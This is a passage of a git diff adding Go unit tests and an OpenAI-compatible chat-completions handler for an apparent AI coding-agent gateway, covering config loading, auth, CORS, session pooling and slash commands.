+	collapsed := formatToolResult(tc, "collapsed")
+	expanded := formatToolResult(tc, "expanded")
+
+	if strings.Contains(collapsed, "```go") {
+		t.Error("collapsed should not have code fence")
+	}
+	if !strings.Contains(expanded, "```go") {
+		t.Error("expanded should have code fence")
+	}
+}
+
+// --- Project-level config test ---
+
+func TestLoadGatewayConfig_ProjectOverlay(t *testing.T) {
+	dir := t.TempDir()
+
+	// Create global config
+	globalDir := filepath.Join(dir, "global")
+	globalPath := filepath.Join(globalDir, "gateway.json")
+	globalCfg := DefaultGatewayConfig()
+	globalCfg.Listen = ":9090"
+	globalCfg.DefaultMode = "agent"
+	SaveGatewayConfig(globalPath, globalCfg)
+
+	// Create project config that overrides some fields
+	projectDir := filepath.Join(dir, "project", ".vibe")
+	os.MkdirAll(projectDir, 0755)
+	projectPath := filepath.Join(projectDir, "gateway.json")
+	os.WriteFile(projectPath, []byte(`{"defaultMode":"yolo","toolVisibility":{"detail":"expanded"}}`), 0644)
+
+	// Load global
+	cfg, err := LoadGatewayConfigFrom(globalPath)
+	if err != nil {
+		t.Fatalf("load: %v", err)
+	}
+	if cfg.DefaultMode != "agent" {
+		t.Errorf("global mode = %q", cfg.DefaultMode)
+	}
+
+	// Overlay project (simulating what LoadGatewayConfig does)
+	data, _ := os.ReadFile(projectPath)
+	json.Unmarshal(data, cfg)
+	normalizeConfig(cfg)
+
+	if cfg.DefaultMode != "yolo" {
+		t.Errorf("project should override mode to yolo, got %q", cfg.DefaultMode)
+	}
+	if cfg.Listen != ":9090" {
+		t.Errorf("listen should be preserved from global, got %q", cfg.Listen)
+	}
+	if cfg.ToolVisibility.Detail != "expanded" {
+		t.Errorf("detail should be overridden to expanded, got %q", cfg.ToolVisibility.Detail)
+	}
+}
+
+func TestToolVisibility_DefaultDetail(t *testing.T) {
+	cfg := DefaultGatewayConfig()
+	if cfg.GetToolDetail() != "collapsed" {
+		t.Errorf("default detail = %q, want collapsed", cfg.GetToolDetail())
+	}
+}
+
+// --- CORS middleware disabled test ---
+
+func TestCORSMiddleware_Disabled(t *testing.T) {
+	inner := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	})
+	handler := CORSMiddleware(CORSConfig{Enabled: false}, inner)
+	req := httptest.NewRequest("GET", "/test", nil)
+	w := httptest.NewRecorder()
+	handler.ServeHTTP(w, req)
+	if w.Code != http.StatusOK {
+		t.Errorf("status = %d, want 200", w.Code)
+	}
+	// CORS headers should NOT be set
+	if got := w.Header().Get("Access-Control-Allow-Origin"); got != "" {
+		t.Errorf("CORS origin should be empty, got %q", got)
+	}
+}
+
+func TestCORSMiddleware_DefaultOrigins(t *testing.T) {
+	handler := CORSMiddleware(CORSConfig{Enabled: true}, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+	req := httptest.NewRequest("GET", "/test", nil)
+	w := httptest.NewRecorder()
+	handler.ServeHTTP(w, req)
+	if got := w.Header().Get("Access-Control-Allow-Origin"); got != "*" {
+		t.Errorf("CORS origin = %q, want *", got)
+	}
+}
+
+func TestGatewaySecurityWarning(t *testing.T) {
+	cfg := DefaultGatewayConfig()
+	cfg.Listen = ":8080"
+	cfg.DefaultMode = "yolo"
+	cfg.Auth.Enabled = false
+	if got := gatewaySecurityWarning(cfg); got == "" {
+		t.Fatal("expected warning for public yolo gateway without auth")
+	}
+
+	cfg.Listen = "127.0.0.1:8080"
+	if got := gatewaySecurityWarning(cfg); got != "" {
+		t.Fatalf("warning for loopback = %q, want empty", got)
+	}
+
+	cfg.Listen = ":8080"
+	cfg.Auth.Enabled = true
+	if got := gatewaySecurityWarning(cfg); got != "" {
+		t.Fatalf("warning with auth = %q, want empty", got)
+	}
+}
+
+// --- Concurrency middleware at capacity test ---
+
+func TestConcurrencyMiddleware_AtCapacity(t *testing.T) {
+	blocking := make(chan struct{})
+	inner := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		<-blocking // block until released
+		w.WriteHeader(http.StatusOK)
+	})
+	handler := ConcurrencyMiddleware(1, inner)
+
+	// Fill the single slot
+	go func() {
+		req := httptest.NewRequest("GET", "/test", nil)
+		w := httptest.NewRecorder()
+		handler.ServeHTTP(w, req)
+	}()
+
+	// Give goroutine time to start
+	time.Sleep(20 * time.Millisecond)
+
+	// Second request should be rejected
+	req := httptest.NewRequest("GET", "/test", nil)
+	w := httptest.NewRecorder()
+	handler.ServeHTTP(w, req)
+
+	if w.Code != http.StatusTooManyRequests {
+		t.Errorf("status = %d, want 429", w.Code)
+	}
+
+	// Release the blocking goroutine
+	close(blocking)
+}
+
+// --- Auth with non-Bearer prefix ---
+
+func TestAuthMiddleware_NonBearerPrefix(t *testing.T) {
+	handler := AuthMiddleware(AuthConfig{Enabled: true, Tokens: []string{"sk-test"}}, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+	req := httptest.NewRequest("GET", "/test", nil)
+	req.Header.Set("Authorization", "Basic dXNlcjpwYXNz")
+	w := httptest.NewRecorder()
+	handler.ServeHTTP(w, req)
+	if w.Code != http.StatusUnauthorized {
+		t.Errorf("status = %d, want 401", w.Code)
+	}
+}
+
+// --- extractBearerToken tests ---
+
+func TestExtractBearerToken(t *testing.T) {
+	tests := []struct {
+		name string
+		auth string
+		want string
+	}{
+		{"empty", "", ""},
+		{"bearer", "Bearer sk-test", "sk-test"},
+		{"bearer with spaces", "Bearer  sk-test ", "sk-test"},
+		{"basic", "Basic dXNlcjpwYXNz", ""},
+		{"no prefix", "sk-test", ""},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			req := httptest.NewRequest("GET", "/", nil)
+			if tt.auth != "" {
+				req.Header.Set("Authorization", tt.auth)
+			}
+			got := extractBearerToken(req)
+			if got != tt.want {
+				t.Errorf("extractBearerToken(%q) = %q, want %q", tt.auth, got, tt.want)
+			}
+		})
+	}
+}
+
+// --- SessionPool advanced tests ---
+
+func TestSessionPool_ReplaceSameID(t *testing.T) {
+	pool := NewSessionPool(1, 0)
+	defer pool.Stop()
+
+	sess1 := &GatewaySession{ID: "sess-1", WorkDir: "/tmp/a", LastUsed: time.Now()}
+	if err := pool.Put(sess1); err != nil {
+		t.Fatalf("put 1: %v", err)
+	}
+
+	// Replace same ID should succeed even at max capacity
+	sess1v2 := &GatewaySession{ID: "sess-1", WorkDir: "/tmp/b", LastUsed: time.Now()}
+	if err := pool.Put(sess1v2); err != nil {
+		t.Fatalf("replace same ID should succeed: %v", err)
+	}
+
+	got := pool.Get("sess-1")
+	if got.WorkDir != "/tmp/b" {
+		t.Errorf("workdir = %q, want /tmp/b", got.WorkDir)
+	}
+}
+
+func TestSessionPool_EvictIdle(t *testing.T) {
+	pool := NewSessionPool(0, 50*time.Millisecond)
+	defer pool.Stop()
+
+	sess := &GatewaySession{ID: "sess-1", LastUsed: time.Now()}
+	pool.Put(sess)
+	// Manually backdate LastUsed after Put (which calls Touch)
+	sess.LastUsed = time.Now().Add(-time.Hour)
+
+	pool.evictIdle()
+
+	if pool.Get("sess-1") != nil {
+		t.Error("idle session should be evicted")
+	}
+}
+
+func TestSessionPool_EvictIdleKeepsFresh(t *testing.T) {
+	pool := NewSessionPool(0, time.Hour)
+	defer pool.Stop()
+
+	sess := &GatewaySession{ID: "sess-1", LastUsed: time.Now()}
+	pool.Put(sess)
+
+	pool.evictIdle()
+
+	if pool.Get("sess-1") == nil {
+		t.Error("fresh session should not be evicted")
+	}
+}
+
+func TestPoolFullError_Error(t *testing.T) {
+	e := &PoolFullError{Max: 5}
+	if e.Error() != "session pool is at capacity" {
+		t.Errorf("error = %q", e.Error())
+	}
+}
+
+// --- parseMessages advanced tests ---
+
+func TestParseMessages_MultipleSystem(t *testing.T) {
+	msgs := []RequestMessage{
+		{Role: "system", Content: "sys1"},
+		{Role: "system", Content: "sys2"},
+		{Role: "user", Content: "hello"},
+	}
+	lastUser, sysMsgs, history := parseMessages(msgs)
+	if lastUser != "hello" {
+		t.Errorf("lastUser = %q", lastUser)
+	}
+	if len(sysMsgs) != 2 {
+		t.Errorf("sysMsgs len = %d, want 2", len(sysMsgs))
+	}
+	if len(history) != 0 {
+		t.Errorf("history len = %d, want 0", len(history))
+	}
+}
+
+func TestParseMessages_SingleUser(t *testing.T) {
+	msgs := []RequestMessage{
+		{Role: "user", Content: "only message"},
+	}
+	lastUser, sysMsgs, history := parseMessages(msgs)
+	if lastUser != "only message" {
+		t.Errorf("lastUser = %q", lastUser)
+	}
+	if len(sysMsgs) != 0 {
+		t.Errorf("sysMsgs len = %d", len(sysMsgs))
+	}
+	if len(history) != 0 {
+		t.Errorf("history len = %d", len(history))
+	}
+}
+
+// --- convertHistoryMessages tests ---
+
+func TestConvertHistoryMessages(t *testing.T) {
+	msgs := []RequestMessage{
+		{Role: "user", Content: "hello"},
+		{Role: "assistant", Content: "hi"},
+		{Role: "system", Content: "ignored"},
+	}
+	result := convertHistoryMessages(msgs)
+	if len(result) != 2 {
+		t.Fatalf("result len = %d, want 2", len(result))
+	}
+	if result[0].Role != "user" {
+		t.Errorf("result[0].Role = %q", result[0].Role)
+	}
+	if result[1].Role != "assistant" {
+		t.Errorf("result[1].Role = %q", result[1].Role)
+	}
+}
+
+func TestConvertHistoryMessages_Empty(t *testing.T) {
+	result := convertHistoryMessages(nil)
+	if len(result) != 0 {
+		t.Errorf("result len = %d, want 0", len(result))
+	}
+}
+
+// --- resolveToolEvent tests ---
+
+func TestResolveToolEvent_FromTopLevel(t *testing.T) {
+	ev := agent.Event{
+		ToolName:   "read",
+		ToolCallID: "call-1",
+	}
+	name, callID := resolveToolEvent(ev)
+	if name != "read" {
+		t.Errorf("name = %q", name)
+	}
+	if callID != "call-1" {
+		t.Errorf("callID = %q", callID)
+	}
+}
+
+func TestResolveToolEvent_FallbackToToolCall(t *testing.T) {
+	ev := agent.Event{
+		ToolCall: &provider.ToolCallBlock{
+			ID:   "call-2",
+			Name: "bash",
+		},
+	}
+	name, callID := resolveToolEvent(ev)
+	if name != "bash" {
+		t.Errorf("name = %q", name)
+	}
+	if callID != "call-2" {
+		t.Errorf("callID = %q", callID)
+	}
+}
+
+func TestResolveToolEvent_TopLevelTakesPrecedence(t *testing.T) {
+	ev := agent.Event{
+		ToolName:   "read",
+		ToolCallID: "call-1",
+		ToolCall: &provider.ToolCallBlock{
+			ID:   "call-2",
+			Name: "bash",
+		},
+	}
+	name, callID := resolveToolEvent(ev)
+	if name != "read" {
+		t.Errorf("name = %q, want read", name)
+	}
+	if callID != "call-1" {
+		t.Errorf("callID = %q, want call-1", callID)
+	}
+}
+
+// --- Commands: mode/model/sessions edge cases ---
+
+func TestCommands_ModeInvalid(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.cmdMode(nil, []string{"/mode", "invalid"})
+	if !result.Error {
+		t.Error("expected error for invalid mode")
+	}
+}
+
+func TestCommands_ModeShowCurrent(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.cmdMode(nil, []string{"/mode"})
+	if result.Error {
+		t.Error("unexpected error")
+	}
+	if !strings.Contains(result.Message, "YOLO") {
+		t.Errorf("expected current mode YOLO, got %q", result.Message)
+	}
+}
+
+func TestCommands_ModeShowSessionOverride(t *testing.T) {
+	srv := newTestServer(t)
+	sess := &GatewaySession{ID: "s1", Mode: "plan"}
+	result := srv.cmdMode(sess, []string{"/mode"})
+	if !strings.Contains(result.Message, "PLAN") {
+		t.Errorf("expected PLAN, got %q", result.Message)
+	}
+}
+
+func TestCommands_ModelNotFound(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.cmdModel([]string{"/model", "nonexistent"})
+	if !result.Error {
+		t.Error("expected error for unknown model")
+	}
+}
+
+func TestCommands_ModelShowCurrent(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.cmdModel([]string{"/model"})
+	if result.Error {
+		t.Error("unexpected error")
+	}
+	if !strings.Contains(result.Message, "Model 1") {
+		t.Errorf("expected Model 1, got %q", result.Message)
+	}
+}
+
+func TestCommands_SessionsList(t *testing.T) {
+	srv := newTestServer(t)
+	srv.pool.Put(&GatewaySession{ID: "s1", LastUsed: time.Now()})
+	srv.pool.Put(&GatewaySession{ID: "s2", LastUsed: time.Now()})
+
+	result := srv.cmdSessions([]string{"/sessions"})
+	if result.Error {
+		t.Error("unexpected error")
+	}
+	if !strings.Contains(result.Message, "s1") || !strings.Contains(result.Message, "s2") {
+		t.Errorf("expected both session IDs, got %q", result.Message)
+	}
+}
+
+func TestCommands_SessionsEmpty(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.cmdSessions([]string{"/sessions"})
+	if !strings.Contains(result.Message, "No active sessions") {
+		t.Errorf("expected no sessions message, got %q", result.Message)
+	}
+}
+
+func TestCommands_SessionsDelete(t *testing.T) {
+	srv := newTestServer(t)
+	srv.pool.Put(&GatewaySession{ID: "s1", LastUsed: time.Now()})
+	result := srv.cmdSessions([]string{"/sessions", "del", "s1"})
+	if result.Error {
+		t.Error("unexpected error")
+	}
+	if srv.pool.Get("s1") != nil {
+		t.Error("session should be deleted")
+	}
+}
+
+func TestCommands_SessionsDeleteNotFound(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.cmdSessions([]string{"/sessions", "del", "nonexistent"})
+	if !result.Error {
+		t.Error("expected error for missing session")
+	}
+}
+
+func TestCommands_SessionsDeleteMissingID(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.cmdSessions([]string{"/sessions", "del"})
+	if !result.Error {
+		t.Error("expected error for missing ID")
+	}
+}
+
+func TestCommands_SessionsUnknownSubcmd(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.cmdSessions([]string{"/sessions", "badcmd"})
+	if !result.Error {
+		t.Error("expected error for unknown subcmd")
+	}
+}
+
+func TestCommands_StatusNoSession(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.cmdStatus(nil)
+	if !result.Error {
+		t.Error("expected error for nil session")
+	}
+}
+
+func TestCommands_SkillNoManager(t *testing.T) {
+	srv := newTestServer(t)
+	srv.skillsMgr = nil
+	result := srv.cmdSkill([]string{"/skill", "test"})
+	if !result.Error {
+		t.Error("expected error when no skills manager")
+	}
+}
+
+func TestCommands_SkillNotFound(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.cmdSkill([]string{"/skill", "nonexistent"})
+	if !result.Error {
+		t.Error("expected error for unknown skill")
+	}
+}
+
+func TestCommands_SkillsEmpty(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.cmdSkills()
+	if !strings.Contains(result.Message, "No skills found") {
+		t.Errorf("expected no skills message, got %q", result.Message)
+	}
+}
+
+func TestCommands_Help(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.cmdHelp()
+	for _, cmd := range []string{"/clear", "/mode", "/model", "/compact", "/help"} {
+		if !strings.Contains(result.Message, cmd) {
+			t.Errorf("help missing %s", cmd)
+		}
+	}
+}
+
+// --- Chat handler method-not-allowed test ---
+
+func TestChatHandler_MethodNotAllowed(t *testing.T) {
+	srv := newTestServer(t)
+	defer srv.pool.Stop()
+
+	req := httptest.NewRequest("GET", "/v1/chat/completions", nil)
+	w := httptest.NewRecorder()
+	srv.handleChatCompletions(w, req)
+
+	if w.Code != http.StatusMethodNotAllowed {
+		t.Errorf("status = %d, want 405", w.Code)
+	}
+}
+
+// --- Type helper tests ---
+
+func TestNewCompletionID(t *testing.T) {
+	id := newCompletionID()
+	if !strings.HasPrefix(id, "chatcmpl-") {
+		t.Errorf("id = %q, want chatcmpl- prefix", id)
+	}
+}
+
+func TestNewCommandCompletionID(t *testing.T) {
+	id := newCommandCompletionID()
+	if !strings.HasPrefix(id, "chatcmpl-cmd-") {
+		t.Errorf("id = %q, want chatcmpl-cmd- prefix", id)
+	}
+}
+
+func TestStringPtr(t *testing.T) {
+	p := stringPtr("test")
+	if *p != "test" {
+		t.Errorf("*p = %q", *p)
+	}
+}
+
+func TestMarshalJSON(t *testing.T) {
+	data := marshalJSON(map[string]string{"key": "val"})
+	if !strings.Contains(string(data), "key") {
+		t.Errorf("data = %s", data)
+	}
+}
+
+// --- langFromPath extended tests ---
+
+func TestLangFromPath(t *testing.T) {
+	tests := []struct {
+		path string
+		want string
+	}{
+		{"main.go", "go"},
+		{"app.py", "python"},
+		{"index.js", "javascript"},
+		{"app.ts", "typescript"},
+		{"comp.tsx", "tsx"},
+		{"comp.jsx", "jsx"},
+		{"main.rs", "rust"},
+		{"app.rb", "ruby"},
+		{"Main.java", "java"},
+		{"main.c", "c"},
+		{"main.h", "c"},
+		{"main.cpp", "cpp"},
+		{"main.cc", "cpp"},
+		{"main.cs", "csharp"},
+		{"main.swift", "swift"},
+		{"main.kt", "kotlin"},
+		{"script.sh", "bash"},
+		{"script.bash", "bash"},
+		{"script.zsh", "zsh"},
+		{"script.ps1", "powershell"},
+		{"query.sql", "sql"},
+		{"index.html", "html"},
+		{"style.css", "css"},
+		{"style.scss", "scss"},
+		{"data.json", "json"},
+		{"config.yaml", "yaml"},
+		{"config.yml", "yaml"},
+		{"config.toml", "toml"},
+		{"data.xml", "xml"},
+		{"README.md", "markdown"},
+		{"main.tf", "hcl"},
+		{"main.lua", "lua"},
+		{"main.php", "php"},
+		{"main.pl", "perl"},
+		{"main.ex", "elixir"},
+		{"main.erl", "erlang"},
+		{"main.hs", "haskell"},
+		{"main.scala", "scala"},
+		{"main.clj", "clojure"},
+		{"main.vim", "vim"},
+		{"schema.proto", "protobuf"},
+		{"schema.graphql", "graphql"},
+		{"config.ini", "ini"},
+		{".env", "bash"},
+		{"Makefile", "makefile"},
+		{"Dockerfile", "dockerfile"},
+		{"Gemfile", "ruby"},
+		{"unknown.xyz", ""},
+	}
+	for _, tt := range tests {
+		t.Run(tt.path, func(t *testing.T) {
+			got := langFromPath(tt.path)
+			if got != tt.want {
+				t.Errorf("langFromPath(%q) = %q, want %q", tt.path, got, tt.want)
+			}
+		})
+	}
+}
+
+// --- formatToolHeaderMD tests ---
+
+func TestFormatToolHeaderMD(t *testing.T) {
+	got := formatToolHeaderMD("read", map[string]any{"path": "main.go"})
+	if got != "🔧 read: main.go" {
+		t.Errorf("got %q", got)
+	}
+	got2 := formatToolHeaderMD("plan", nil)
+	if got2 != "🔧 plan" {
+		t.Errorf("got %q", got2)
+	}
+}
+
+// --- formatToolHeader tests ---
+
+func TestFormatToolHeader(t *testing.T) {
+	got := formatToolHeader("bash", map[string]any{"command": "ls"})
+	if got != "🔧 [bash] ls" {
+		t.Errorf("got %q", got)
+	}
+	got2 := formatToolHeader("plan", nil)
+	if got2 != "🔧 [plan]" {
+		t.Errorf("got %q", got2)
+	}
+}
+
+// --- toolKeyArg: bash long command truncation ---
+
+func TestToolKeyArg_BashLongCommand(t *testing.T) {
+	longCmd := strings.Repeat("a", 200)
+	got := toolKeyArg("bash", map[string]any{"command": longCmd})
+	if len(got) > 124 { // 120 + "..."
+		t.Errorf("expected truncated, got len %d", len(got))
+	}
+	if !strings.HasSuffix(got, "...") {
+		t.Error("expected ... suffix")
+	}
+}
+
+// --- GatewaySession Touch/Lock ---
+
+func TestGatewaySession_Touch(t *testing.T) {
+	sess := &GatewaySession{ID: "s1"}
+	sess.Touch()
+	if sess.LastUsed.IsZero() {
+		t.Error("expected non-zero LastUsed after Touch")
+	}
+}
+
+func TestGatewaySession_LockUnlock(t *testing.T) {
+	sess := &GatewaySession{ID: "s1"}
+	sess.Lock()
+	sess.Unlock()
+	// No panic = pass
+}
+
+// --- Default session ID tests ---
+
+func TestDefaultSessionID_EmptyReusesSession(t *testing.T) {
+	srv := newTestServer(t)
+	defer srv.pool.Stop()
+
+	// First request without x_session_id — should create a session
+	body1 := `{"messages":[{"role":"user","content":"/status"}],"stream":false}`
+	req1 := httptest.NewRequest("POST", "/v1/chat/completions", strings.NewReader(body1))
+	w1 := httptest.NewRecorder()
+	srv.handleChatCompletions(w1, req1)
+
+	if w1.Code != http.StatusOK {
+		t.Fatalf("req1 status = %d, body = %s", w1.Code, w1.Body.String())
+	}
+	var resp1 ChatCompletionResponse
+	json.NewDecoder(w1.Body).Decode(&resp1)
+	sessID1 := resp1.XSessionID
+	if sessID1 == "" {
+		t.Fatal("first request should return a session ID")
+	}
+
+	// Second request without x_session_id — should reuse the same session
+	body2 := `{"messages":[{"role":"user","content":"/status"}],"stream":false}`
+	req2 := httptest.NewRequest("POST", "/v1/chat/completions", strings.NewReader(body2))
+	w2 := httptest.NewRecorder()
+	srv.handleChatCompletions(w2, req2)
+
+	if w2.Code != http.StatusOK {
+		t.Fatalf("req2 status = %d", w2.Code)
+	}
+	var resp2 ChatCompletionResponse
+	json.NewDecoder(w2.Body).Decode(&resp2)
+
+	if resp2.XSessionID != sessID1 {
+		t.Errorf("second request should reuse session: got %q, want %q", resp2.XSessionID, sessID1)
+	}
+}
+
+func TestDefaultSessionID_ExplicitIDOverrides(t *testing.T) {
+	srv := newTestServer(t)
+	defer srv.pool.Stop()
+
+	// First request without x_session_id
+	body1 := `{"messages":[{"role":"user","content":"/status"}],"stream":false}`
+	req1 := httptest.NewRequest("POST", "/v1/chat/completions", strings.NewReader(body1))
+	w1 := httptest.NewRecorder()
+	srv.handleChatCompletions(w1, req1)
+	var resp1 ChatCompletionResponse
+	json.NewDecoder(w1.Body).Decode(&resp1)
+	defaultID := resp1.XSessionID
+
+	// Second request WITH explicit x_session_id — should use that, not default
+	body2 := `{"messages":[{"role":"user","content":"/status"}],"stream":false,"x_session_id":"explicit-sess"}`
+	req2 := httptest.NewRequest("POST", "/v1/chat/completions", strings.NewReader(body2))
+	w2 := httptest.NewRecorder()
+	srv.handleChatCompletions(w2, req2)
+	var resp2 ChatCompletionResponse
+	json.NewDecoder(w2.Body).Decode(&resp2)
+
+	if resp2.XSessionID != "explicit-sess" {
+		t.Errorf("explicit session should be used: got %q", resp2.XSessionID)
+	}
+
+	// Third request without x_session_id — should still use the default, not "explicit-sess"
+	body3 := `{"messages":[{"role":"user","content":"/status"}],"stream":false}`
+	req3 := httptest.NewRequest("POST", "/v1/chat/completions", strings.NewReader(body3))
+	w3 := httptest.NewRecorder()
+	srv.handleChatCompletions(w3, req3)
+	var resp3 ChatCompletionResponse
+	json.NewDecoder(w3.Body).Decode(&resp3)
+
+	if resp3.XSessionID != defaultID {
+		t.Errorf("third request should reuse default: got %q, want %q", resp3.XSessionID, defaultID)
+	}
+}
+
+func TestDefaultSessionID_PoolCount(t *testing.T) {
+	srv := newTestServer(t)
+	defer srv.pool.Stop()
+
+	// Multiple requests without x_session_id should all share one session
+	for i := 0; i < 5; i++ {
+		body := `{"messages":[{"role":"user","content":"/help"}],"stream":false}`
+		req := httptest.NewRequest("POST", "/v1/chat/completions", strings.NewReader(body))
+		w := httptest.NewRecorder()
+		srv.handleChatCompletions(w, req)
+	}
+
+	if srv.pool.Count() != 1 {
+		t.Errorf("pool count = %d, want 1 (all should share default session)", srv.pool.Count())
+	}
+}
diff --git a/internal/gateway/handler_chat.go b/internal/gateway/handler_chat.go
new file mode 100644
index 0000000..e4d9abe
--- /dev/null
+++ b/internal/gateway/handler_chat.go
@@ -0,0 +1,559 @@
+package gateway
+
+import (
+	"context"
+	"encoding/json"
+	"io"
+	"net/http"
+	"strings"
+	"time"
+
+	"github.com/startvibecoding/vibecoding/internal/agent"
+	ctxpkg "github.com/startvibecoding/vibecoding/internal/context"
+	"github.com/startvibecoding/vibecoding/internal/provider"
+	"github.com/startvibecoding/vibecoding/internal/session"
+	"github.com/startvibecoding/vibecoding/internal/tools"
+)
+
+func (s *Server) handleChatCompletions(w http.ResponseWriter, r *http.Request) {
+	if r.Method != http.MethodPost {
+		writeError(w, http.StatusMethodNotAllowed, "method not allowed", "invalid_request_error")
+		return
+	}
+
+	body, err := io.ReadAll(io.LimitReader(r.Body, 10<<20)) // 10MB limit
+	if err != nil {
+		writeError(w, http.StatusBadRequest, "failed to read request body", "invalid_request_error")
+		return
+	}
+	defer r.Body.Close()
+
+	var req ChatCompletionRequest
+	if err := json.Unmarshal(body, &req); err != nil {
+		writeError(w, http.StatusBadRequest, "invalid JSON: "+err.Error(), "invalid_request_error")
+		return
+	}
+
+	if len(req.Messages) == 0 {
+		writeError(w, http.StatusBadRequest, "messages array is required and must not be empty", "invalid_request_error")
+		return
+	}
+
+	// Validate x_working_dir
+	workDir := s.cfg.GetWorkDir()
+	if req.XWorkingDir != "" {
+		if err := s.cfg.ValidateWorkDir(req.XWorkingDir); err != nil {
+			writeError(w, http.StatusForbidden, err.Error(), "permission_error")
+			return
+		}
+		workDir = req.XWorkingDir
+	}
+
+	// Resolve model
+	s.mu.RLock()
+	currentModel := s.model
+	currentProvider := s.provider
+	s.mu.RUnlock()
+
+	if req.Model != "" {
+		if m := currentProvider.GetModel(req.Model); m != nil {
+			currentModel = m
+		}
+	}
+	currentModel = cloneModel(currentModel)
+
+	// Extract last user message
+	lastUserMsg, systemMsgs, historyMsgs := parseMessages(req.Messages)
+	if lastUserMsg == "" {
+		writeError(w, http.StatusBadRequest, "no user message found", "invalid_request_error")
+		return
+	}
+
+	// Get or create session
+	sessionID := req.XSessionID
+	if sessionID == "" {
+		// Fall back to the default session for this gateway instance
+		s.mu.RLock()
+		sessionID = s.defaultSessionID
+		s.mu.RUnlock()
+	}
+	sess := s.getOrCreateSession(sessionID, workDir)
+	if sess == nil {
+		writeError(w, http.StatusServiceUnavailable, "session pool is at capacity", "server_error")
+		return
+	}
+
+	// Check for slash command
+	if cmdResult := s.handleCommand(sess, lastUserMsg); cmdResult != nil {
+		// If /clear, we need to reset agent state on the session
+		if strings.HasPrefix(strings.TrimSpace(lastUserMsg), "/clear") {
+			// Create a fresh session manager but keep the session slot
+			newMgr := session.New(sess.WorkDir, s.settings.GetSessionDir())
+			if err := newMgr.Init(); err == nil {
+				sess.Manager = newMgr
+			}
+		}
+		if req.Stream {
+			s.writeCommandResponseStreaming(w, cmdResult, currentModel.ID, sess.ID, lastUserMsg)
+		} else {
+			s.writeCommandResponse(w, cmdResult, currentModel.ID, sess.ID, lastUserMsg)
+		}
+		return
+	}
+
+	// Lock session for serial processing
+	sess.Lock()
+	defer sess.Unlock()
+	sess.Touch()
+
+	// Determine mode
+	mode := s.cfg.DefaultMode
+	if sess.Mode != "" {
+		mode = sess.Mode
+	}
+	if req.XMode != "" {
+		mode = req.XMode
+	}
+
+	// Build extra context: system prompt handling
+	extraContext := s.extraContext
+	if s.cfg.SystemPromptMode == "append" && len(systemMsgs) > 0 {
+		extraContext += "\n## Client Instructions\n" + strings.Join(systemMsgs, "\n") + "\n"
+	}
+
+	// Build compaction settings
+	compactionSettings := ctxpkg.CompactionSettings{
+		Enabled:          s.settings.Compaction.Enabled,
+		ReserveTokens:    s.settings.Compaction.ReserveTokens,
+		KeepRecentTokens: s.settings.Compaction.KeepRecentTokens,
+	}
+	if compactionSettings.ReserveTokens == 0 {
+		compactionSettings.ReserveTokens = 16384
+	}
+	if compactionSettings.KeepRecentTokens == 0 {
+		compactionSettings.KeepRecentTokens = 20000
+	}
+
+	// Build agent config
+	thinkingLevel := provider.ThinkingLevel(s.cfg.DefaultThinkingLevel)
+	if thinkingLevel == "" {
+		thinkingLevel = provider.ThinkingLevel(s.settings.DefaultThinkingLevel)
+	}
+
+	maxTokens := s.settings.MaxOutputTokens
+	if req.MaxTokens > 0 {
+		maxTokens = req.MaxTokens
+	}
+
+	// Per-request temperature/top_p override (from OpenAI-compatible client)
+	if req.Temperature != nil {
+		currentModel.Temperature = req.Temperature
+	}
+	if req.TopP != nil {
+		currentModel.TopP = req.TopP
+	}
+
+	// Register sub-agent tools before agent construction; the agent freezes tools at New().
+	if s.cfg.EnableSubAgents && sess.AgentMgr != nil {
+		sess.Registry.Register(agent.NewSubAgentSpawnTool(sess.AgentMgr))
+		sess.Registry.Register(agent.NewSubAgentStatusTool(sess.AgentMgr))
+		sess.Registry.Register(agent.NewSubAgentSendTool(sess.AgentMgr))
+		sess.Registry.Register(agent.NewSubAgentDestroyTool(sess.AgentMgr))
+	}
+
+	agentCfg := agent.Config{
+		Provider:           currentProvider,
+		Model:              currentModel,
+		Mode:               mode,
+		ThinkingLevel:      thinkingLevel,
+		MaxTokens:          maxTokens,
+		SandboxMgr:         s.sandboxMgr,
+		Settings:           s.settings,
+		Session:            sess.Manager,
+		ExtraContext:       extraContext,
+		CompactionSettings: compactionSettings,
+		MultiAgent:         s.cfg.EnableSubAgents,
+	}
+
+	a := agent.New(agentCfg, sess.Registry)
+
+	// Apply force compact flag from /compact command
+	if sess.ForceCompact {
+		a.SetForceCompact()
+		sess.ForceCompact = false
+	}
+
+	// Load history if this is a new session with client-provided history
+	if len(historyMsgs) > 0 && len(sess.Manager.GetMessages()) == 0 {
+		internalMsgs := convertHistoryMessages(historyMsgs)
+		a.LoadHistoryMessages(internalMsgs)
+	}
+
+	// Setup request timeout
+	timeout := time.Duration(s.cfg.RequestTimeoutSecs) * time.Second
+	ctx, cancel := context.WithTimeout(r.Context(), timeout)
+	defer cancel()
+	if s.cfg.EnableSubAgents && sess.AgentMgr != nil {
+		sess.AgentMgr.Register(agent.NewAgentAdapter(a))
+		defer func() {
+			sess.AgentMgr.Finish(a.ID(), ctx.Err())
+		}()
+	}
+
+	// Run agent
+	eventCh := a.Run(ctx, lastUserMsg)
+
+	if req.Stream {
+		s.handleStreamingResponse(w, r, eventCh, currentModel.ID, sess.ID)
+	} else {
+		s.handleNonStreamingResponse(w, eventCh, currentModel.ID, sess.ID)
+	}
+}
+
+func cloneModel(model *provider.Model) *provider.Model {
+	if model == nil {
+		return nil
+	}
+	copy := *model
+	copy.Input = append([]string(nil), model.Input...)
+	if model.Compat != nil {
